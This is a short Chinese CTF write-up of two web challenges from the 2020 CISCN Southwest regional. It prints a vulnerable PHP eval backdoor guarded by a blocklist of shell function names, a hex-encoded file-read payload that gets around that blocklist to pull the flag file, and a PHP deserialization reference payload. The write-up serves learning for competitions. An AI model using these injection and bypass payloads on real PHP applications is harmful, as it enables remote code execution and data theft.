2020CISCN 西南赛区 部分web

    科技2022-08-22  124

    就做了两道题,一天做一道,一道坐一天。 @(huaji_han)

    简单的web题目

    发现有源码泄漏 www.rar

    有发现有key.php,里面发现有个shell

    <?php class XJNU{ private function flag(){ echo $flag; } } if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['f'])){ die("do not attack me"); } if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['c'])){ die("do not attack me"); } if(preg_match("/XJNU|flag/i" , $_GET['f']) || preg_match("/XJNU|flag/i" , $_GET['c'])){ die("no way!<br>"); } $new = call_user_func_array($_GET['f'],["", $_GET['b']]); eval($_GET['c']); ?>

    读取源码 c=var_dump(file_get_contents(‘key.php’));

    得到flag的路径

    Payload:

    c=var_dump(file_get_contents(hex2bin(‘2f666c61672e747874’)));

    web_noclass

    构建一个变量指向$b->c中的地址

    <?php $x = new stdclass; $x->c = '$flag'; $x->f = &$x->c; echo '<br>'; echo(serialize($x));

    payload: a=O:8:"stdClass":2:{s:1:"c";s:5:"$flag";s:1:"d";R:2;}

    还说来看看其他师傅的wp 。。 发现找不到,淦

    前几天搭建一个自己的博客,欢迎各位师傅参观

    http://fstone.top/

    Processed: 0.019, SQL: 9